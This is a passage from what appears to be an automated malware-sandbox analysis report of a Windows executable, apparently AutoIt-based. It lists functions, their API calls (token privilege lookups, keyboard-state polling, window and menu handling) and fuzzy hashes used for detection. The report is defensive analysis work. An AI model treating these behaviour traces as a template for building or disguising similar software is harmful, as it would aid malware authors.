                                                                                          • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                          • ReleaseCapture.USER32 ref: 0046F589
                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                          • API String ID: 2483343779-2060113733
                                                                                          • Opcode ID: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                                          • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                          • Opcode Fuzzy Hash: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                                          • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                          Function 0046FD7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                          • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                          • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                          • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                          • String ID: 2
                                                                                          • API String ID: 1331449709-450215437
                                                                                          • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                          • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                          • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                          • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                          Function 004393E2 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                          • _memcmp.LIBCMT ref: 004394A9
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                          Strings
                                                                                          • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                          • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                          • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                          • API String ID: 1446985595-805462909
                                                                                          • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                          • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                          • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                          • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                          Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$DriveType
                                                                                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                          • API String ID: 2907320926-41864084
                                                                                          • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                          • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                          • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                          • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                          Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                          • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                          • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID:
                                                                                          • API String ID: 1932665248-0
                                                                                          • Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                          • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                          • Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                          • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                          Function 004480F2 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                          • _memset.LIBCMT ref: 004481BA
                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                          • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$LongWindow_memset
                                                                                          • String ID:
                                                                                          • API String ID: 830647256-0
                                                                                          • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                          • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                          • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                          • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                          Function 0046EA7F Relevance: 16.7, APIs: 11, Instructions: 167windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                          • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                          • DeleteObject.GDI32(00740000), ref: 0046EB4F
                                                                                          • DestroyIcon.USER32(0041005C), ref: 0046EB67
                                                                                          • DeleteObject.GDI32(0001B228), ref: 0046EB7F
                                                                                          • DestroyWindow.USER32(00730055), ref: 0046EB97
                                                                                          • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                          • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                          • String ID:
                                                                                          • API String ID: 802431696-0
                                                                                          • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                          • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                          • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                          • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                          Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                          • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                          • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                          • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                          • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                          • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: State$Async$Keyboard
                                                                                          • String ID:
                                                                                          • API String ID: 541375521-0
                                                                                          • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                          • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                                          • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                          • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                                          Function 00474335 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 308COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HH
                                                                                          • API String ID: 0-2761332787
                                                                                          • Opcode ID: 42510643c9cdba6d1e7b7cb61b235febd1ff76eef9dce87624ca7f12cd0f3b2e
                                                                                          • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                                          • Opcode Fuzzy Hash: 42510643c9cdba6d1e7b7cb61b235febd1ff76eef9dce87624ca7f12cd0f3b2e
                                                                                          • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                                          Function 004507E7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                                          • _wcslen.LIBCMT ref: 00450944
                                                                                          • _wcscat.LIBCMT ref: 00450955
                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window_wcscat_wcslen
                                                                                          • String ID: -----$SysListView32
                                                                                          • API String ID: 4008455318-3975388722
                                                                                          • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                          • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                                          • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                          • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                          Function 00448602 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 00448625
                                                                                          • CreateMenu.USER32 ref: 0044863C
                                                                                          • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                          • IsMenu.USER32(?), ref: 004486EB
                                                                                          • CreatePopupMenu.USER32 ref: 004486F5
                                                                                          • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                          • DrawMenuBar.USER32 ref: 00448742
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 176399719-4108050209
                                                                                          • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                          • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                          • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                          • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                          Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                          • GetParent.USER32 ref: 004692A4
                                                                                          • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                          • GetParent.USER32 ref: 004692C7
                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CtrlParent$_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 2040099840-1403004172
                                                                                          • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                          • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                          • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                          • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                          Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                          • GetParent.USER32 ref: 0046949E
                                                                                          • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                          • GetParent.USER32 ref: 004694C1
                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CtrlParent$_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 2040099840-1403004172
